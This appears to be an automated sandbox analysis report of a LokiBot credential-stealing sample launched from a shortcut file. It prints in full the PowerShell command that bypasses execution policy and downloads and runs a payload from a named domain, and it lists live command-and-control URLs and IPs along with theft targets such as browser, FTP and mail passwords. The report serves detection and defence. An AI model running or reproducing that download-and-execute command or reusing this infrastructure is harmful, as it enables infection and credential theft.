Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 8A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 9A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: AC90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: BC90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: C120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: D120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 5550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 6680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 7A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 8A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 9A10000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3537			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6313			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe TID: 1084	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe TID: 64	Thread sleep time: -900000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: mjtjewi.exe, 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mjtjewi.exe, 00000006.00000002.1470908849.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, mjtjewi.exe, 00000007.00000002.1473273192.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
Source: powershell.exe, 00000000.00000002.1507180884.0000020C63BC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\mjtjewi.exe

Code function: 6_2_0040317B mov eax, dword ptr fs:[00000030h]

6_2_0040317B

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\mjtjewi.exe

Code function: 6_2_00402B7C GetProcessHeap,HeapAlloc,

6_2_00402B7C

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_4552.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: unknown

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\mjtjewi.exe	Memory written: C:\Users\user\Desktop\mjtjewi.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory written: C:\Users\user\Desktop\mjtjewi.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory written: C:\Users\user\Desktop\mjtjewi.exe base: 400000 value starts with: 4D5A	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\OpenWith.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe "C:\Users\user\Desktop\mjtjewi.exe"	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -command openwith.exe;(new-object system.net.webclient).downloadfile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbafrawyegfyaugeygywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').attributes += 'hidden';

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Queries volume information: C:\Users\user\Desktop\mjtjewi.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mjtjewi.exe PID: 1392, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\mjtjewi.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\mjtjewi.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\mjtjewi.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\mjtjewi.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: PopPassword		6_2_0040D069
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: SmtpPassword		6_2_0040D069

Yara detected Credential Stealer

Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	www.sodiumlaurethsulfatedesyroyer.com	European Union		13335	CLOUDFLARENETUS	true
45.149.241.169	freighteighttwocam.ddns.net	Germany		701	UUNETUS	true

Contacted Domains

Name	IP	Active
freighteighttwocam.ddns.net	45.149.241.169	true
www.sodiumlaurethsulfatedesyroyer.com	188.114.96.3	true

Contacted URLs

Name	Malicious	Reputation
http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php	true	unknown
http://kbfvzoboss.bid/alien/fre.php	true	unknown
http://alphastand.top/alien/fre.php	true	unknown
http://alphastand.win/alien/fre.php	true	unknown
http://alphastand.trade/alien/fre.php	true	unknown
https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif	true	unknown

AV Detection

Found malware configuration

Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\mjtjewi.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Comprobante.lnk.lnk

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.11:49710 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64389 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64389 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64389 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64384 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64384 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64384 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64387 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64379 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64389 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64389 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49711 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49711 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49711 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64357 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64357 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64357 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64387 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64387 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64375 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64375 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64375 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.11:49711 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64379 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64379 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64357 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64357 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64387 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64387 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64375 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64379 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64375 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64379 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64384 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64389
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64384 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64354 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64354 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64354 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64384
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64391 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64391 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64391 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64354 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64354 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64391 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64354
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64391 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64379
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64350 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64350 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64350 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64391
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64410 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64410 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64410 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64403 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64402 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64350 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64402 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64350 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64402 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64404 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64404 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64350
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64404 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64352 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64363 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64363 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64361 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64387
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49715 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64402 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64376 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64358 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64376 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64402 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64404 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64410 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64404 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64407 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64407 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64407 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64368 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49718 -> 45.149.241.169:80
